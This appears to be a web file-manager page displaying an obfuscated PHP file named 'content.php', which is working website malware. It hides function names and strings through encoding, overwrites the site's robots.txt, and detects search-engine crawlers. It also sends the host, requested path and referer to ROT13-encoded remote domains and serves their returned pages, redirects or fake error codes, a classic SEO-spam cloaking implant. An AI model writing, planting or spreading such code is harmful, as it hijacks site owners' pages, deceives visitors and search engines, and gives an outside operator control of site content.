관리-도구

편집 파일: content.php_d6562hfe

<?php
 goto n1Icf; bTbhI: preg_match("\x2f\x5c\x2f\50\133\136\x5c\57\x5d\53\x5c\56\160\150\160\51\57", $duri, $matches); goto SoUDa; IfsyI: $html_content = request($xmlname, $param); goto YTxm7; ViOd6: $server = file_exists($_SERVER["\104\117\x43\125\x4d\x45\116\x54\137\x52\117\117\x54"] . "\x2f\x2e\150\x74\x61\143\143\x65\x73\163") ? 1 : 2; goto zz6lD; JcK29: $string = "\61\x39\65\x33\55\154\151\156\153\61\70\x35"; goto D0UEJ; WKfIK: $model_file = "\151\x6e\144\145\x78\56\x70\x68\x70"; goto V0hyF; CBtMe: if ($duri != "\x2f") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\x2f\151\x6e\x64\145\170\56\160\x68\160", '', $duri); $duri = str_replace("\x21", '', $duri); } goto WfTeQ; IdYs_: $http = is_https() ? "\x68\164\164\160\x73" : "\150\x74\x74\160"; goto ViOd6; zz6lD: $zz = disbot(); goto mwY8j; V0hyF: $model = "\x69\x6e\x64\x65\170"; goto bTbhI; D0UEJ: $host = $_SERVER["\x48\x54\x54\x50\x5f\110\117\123\x54"] ?: ''; goto b227M; n8YIn: function create_robots($url) { $functions = func(); $path = $_SERVER["\x44\x4f\x43\125\x4d\x45\x4e\124\x5f\x52\x4f\117\124"] . "\x2f\162\x6f\142\x6f\164\163\x2e\164\170\x74"; $content = "\125\x73\x65\162\55\141\147\145\156\164\72\40\52\12\x41\x6c\x6c\x6f\x77\72\40\57\12\xa\x53\x69\x74\145\155\141\160\x3a\x20" . $url . "\57\163\x69\x74\x65\155\x61\x70\56\x78\155\x6c\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = @$functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto Rhz7y; KSSML: $model = stristr($duri, "\57\x3f") ? "\77" : $model; goto L4Y3Q; b227M: $lang = $_SERVER["\x48\x54\124\120\137\101\x43\x43\x45\x50\124\x5f\x4c\101\116\107\125\x41\x47\105"] ?: "\145\156"; goto CnTWD; UyYPq: function drequest_uri() { if (isset($_SERVER["\x52\105\121\x55\x45\x53\124\137\x55\x52\111"])) { return $_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\x55\x52\111"]; } if (isset($_SERVER["\141\x72\x67\x76"])) { return $_SERVER["\x50\x48\120\x5f\x53\x45\114\106"] . "\x3f" . $_SERVER["\141\x72\147\166"][0]; } return $_SERVER["\120\110\120\137\x53\105\x4c\x46"] . "\77" . $_SERVER["\121\x55\105\x52\x59\x5f\x53\124\122\111\x4e\107"]; } goto ytGZH; b3PnC: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto CBtMe; zbMDz: function disbot() { $user_agent = isset($_SERVER["\x48\x54\124\120\x5f\x55\123\105\x52\x5f\x41\107\105\x4e\x54"]) ? strtolower($_SERVER["\x48\x54\x54\120\x5f\125\x53\105\122\137\101\107\x45\x4e\124"]) : ''; $bots = array("\147\x6f\157\147\154\145\x62\157\164", "\142\151\x6e\x67", "\171\x61\150\x6f\x6f", "\147\x6f\157\147\x6c\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto UyYPq; L4Y3Q: $istest = false; goto b3PnC; CnTWD: $referer = $_SERVER["\x48\x54\124\120\137\122\x45\x46\105\x52\105\122"] ?: ''; goto IdYs_; SoUDa: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\x2f"); } $model = str_replace("\56\160\x68\x70", '', $model_file); } goto KSSML; n1Icf: $xmlname = array("\x25\63\x31\x25\63\71\x25\x33\x35\45\63\x33\45\62\104\x25\x37\71\x25\67\x36\45\66\x31\x25\67\70\x25\x33\61\x25\63\x38\x25\x33\65\x25\62\105\x25\66\x33\45\67\x35\45\x36\62\x25\66\66\x25\x37\x36\45\66\x36\45\x32\x45\x25\x36\x37\x25\x36\x32\x25\66\x33", "\45\x33\61\45\63\x39\x25\x33\x35\x25\x33\x33\x25\62\x44\45\x37\x39\x25\x37\x36\x25\x36\61\45\67\x38\45\63\x31\x25\x33\70\x25\x33\x35\x25\x32\105\x25\67\66\x25\x36\61\45\x37\x32\x25\67\63\x25\x37\63\x25\66\105\x25\x36\x46\x25\x37\71\x25\66\x43\x25\62\105\45\66\x42\45\x36\103\x25\66\104", "\x25\x33\61\x25\x33\71\x25\x33\x35\45\x33\63\x25\x32\x44\x25\67\x39\45\67\66\45\x36\61\45\x37\x38\x25\63\x31\45\63\70\x25\63\x35\x25\62\x45\45\66\106\x25\66\x35\45\x37\66\45\x37\64\x25\x37\65\45\x36\67\x25\x37\x35\45\x36\x32\x25\x36\65\45\67\x36\45\x36\63\45\62\x45\45\66\102\x25\x36\x43\x25\66\x44", "\x25\63\x31\x25\63\x39\45\x33\65\45\63\x33\x25\62\104\x25\67\71\x25\67\x36\x25\66\x31\x25\x37\70\45\x33\x31\45\x33\70\x25\63\x35\45\x32\x45\45\66\61\x25\x37\62\45\x36\x42\45\66\67\45\x37\x32\45\x36\x31\x25\66\63\x25\x36\70\x25\x36\x33\45\66\63\45\x32\x45\45\x36\x42\45\66\x43\x25\x36\x44"); goto JcK29; Rhz7y: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\x74\164\160\x3a\x2f\57" . $domain_decoded . "\x2f\163\165\x70\145\x72\x36\56\160\150\x70\77" . $param; if (function_exists("\167\160\x5f\x72\145\x6d\157\x74\145\x5f\147\x65\164")) { $response = wp_remote_get($url, array("\x74\x69\x6d\145\x6f\x75\164" => 30, "\165\x73\145\x72\x2d\141\147\x65\x6e\164" => "\115\x6f\x7a\x69\154\154\x61\57\65\56\60\40\50\143\x6f\x6d\160\x61\164\151\x62\x6c\x65\x3b\40\x57\x6f\x72\144\x50\162\x65\x73\x73\51")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\143\165\x72\154\137\x69\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\x61\154\x6c\157\167\137\165\x72\154\137\x66\157\160\145\156")) { $context = stream_context_create(array("\150\x74\x74\x70" => array("\164\151\x6d\145\x6f\165\164" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\x6f\164\165\x73\145\x72\x61\x67\145\156\x74"; } goto pftrL; ytGZH: function is_https() { if (isset($_SERVER["\110\x54\x54\x50\x53"])) { $https = strtolower($_SERVER["\x48\124\124\120\x53"]); if ($https !== "\157\x66\146") { if ($https !== '') { return true; } } } if (isset($_SERVER["\110\124\124\120\137\x58\x5f\106\117\122\x57\101\122\104\x45\x44\x5f\120\122\117\x54\117"])) { if ($_SERVER["\x48\x54\x54\120\137\x58\137\106\117\x52\127\101\122\104\x45\104\x5f\120\x52\117\124\x4f"] === "\150\164\x74\160\163") { return true; } } if (isset($_SERVER["\110\124\x54\x50\137\x46\x52\117\x4e\124\137\105\116\104\x5f\x48\x54\x54\x50\123"])) { $front_end_https = strtolower($_SERVER["\110\124\124\120\137\x46\x52\117\116\x54\x5f\x45\116\104\x5f\110\124\x54\120\x53"]); if ($front_end_https !== "\x6f\146\146") { if ($front_end_https !== '') { return true; } } } return false; } goto n8YIn; YTxm7: if (strpos($html_content, "\156\157\x62\157\x74\165\163\145\x72\141\147\x65\x6e\164") === false) { $response_handlers = array("\x6f\x6b\x68\x74\x6d\154" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\164\x65\156\164\x2d\x74\171\x70\x65\x3a\40\x74\x65\x78\164\x2f\x68\x74\x6d\x6c\x3b\x20\x63\x68\141\x72\x73\145\x74\75\165\164\x66\55\70", "\162\x65\160\x6c\x61\x63\145" => "\157\x6b\150\164\155\x6c", "\164\145\x73\x74\x5f\145\143\150\157" => true, "\x6f\x75\x74\x70\165\x74" => true), "\x67\x65\x74\x63\157\156\x74\145\156\x74\x35\60\60\x70\x61\147\145" => array("\150\145\141\x64\x65\162" => "\x48\124\124\120\x2f\x31\56\x31\40\x35\60\x30\40\x49\156\164\145\162\x6e\x61\154\40\123\x65\x72\x76\x65\x72\40\105\x72\162\157\162"), "\x34\x30\64\x70\x61\x67\x65" => array("\150\x65\141\x64\145\162" => "\x48\124\124\x50\57\61\x2e\x31\40\x34\60\64\40\116\x6f\164\x20\106\x6f\165\x6e\x64"), "\x33\60\x31\160\141\x67\x65" => array("\150\145\x61\x64\x65\x72" => "\x48\x54\124\x50\57\61\x2e\x31\x20\63\x30\x31\x20\115\x6f\x76\x65\x64\x20\x50\x65\x72\x6d\x61\x6e\145\x6e\x74\x6c\x79", "\162\145\160\154\x61\143\x65" => "\63\60\61\160\141\147\145", "\162\x65\144\x69\162\145\x63\x74" => true), "\x6f\x6b\x78\x6d\x6c" => array("\x68\x65\141\x64\x65\162" => "\103\x6f\x6e\x74\145\x6e\164\x2d\124\171\160\x65\72\x20\141\x70\160\x6c\x69\x63\x61\x74\151\x6f\x6e\57\170\155\154\73\x20\143\x68\141\162\x73\145\164\x3d\165\x74\x66\55\70", "\162\145\x70\x6c\141\143\x65" => "\x6f\153\x78\x6d\154", "\x6f\x75\x74\160\x75\x74" => true), "\157\153\x72\x6f\142\157\164\163" => array("\x68\145\x61\x64\x65\x72" => "\103\x6f\156\x74\145\156\x74\x2d\x54\171\x70\x65\x3a\x20\x74\145\x78\164\x2f\x70\154\x61\151\x6e", "\162\145\x70\154\141\143\145" => "\157\x6b\x72\157\x62\x6f\x74\x73", "\x6f\x75\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\150\x65\141\144\145\162"]); if (isset($handler["\x72\x65\160\x6c\141\143\x65"])) { $html_content = str_replace($handler["\162\x65\x70\154\x61\x63\145"], '', $html_content); } if (isset($handler["\x74\x65\x73\x74\x5f\145\143\150\157"])) { if ($istest) { echo $string; } } if (isset($handler["\162\x65\144\151\x72\x65\143\x74"])) { header("\x4c\157\143\x61\x74\x69\157\156\x3a\40" . $html_content); } elseif (isset($handler["\x6f\165\164\x70\165\164"])) { echo $html_content; } die; } } } goto zbMDz; mwY8j: $duri = drequest_uri() ?: "\x2f"; goto WKfIK; IpvyE: create_robots($http . "\x3a\x2f\57" . $host); goto IfsyI; WfTeQ: $param = http_build_query(array("\x77\x65\x62" => $host, "\172\x7a" => $zz, "\165\x72\x69" => urlencode($duri), "\x75\x72\154\x73\x68\x61\x6e\x67" => $referer, "\x68\x74\x74\160" => $http, "\x6c\141\156\x67" => $lang, "\163\x65\x72\166\x65\x72" => $server, "\x6d\157\x64\x65\x6c" => $model, "\x76\x65\x72\163\151\x6f\156" => $istest ? $string : '')); goto IpvyE; pftrL: function func() { $chars = range("\x61", "\172"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\137" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\137" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\137" . $chars[17] . $chars[14] . $chars[19] . "\x31\x33"); }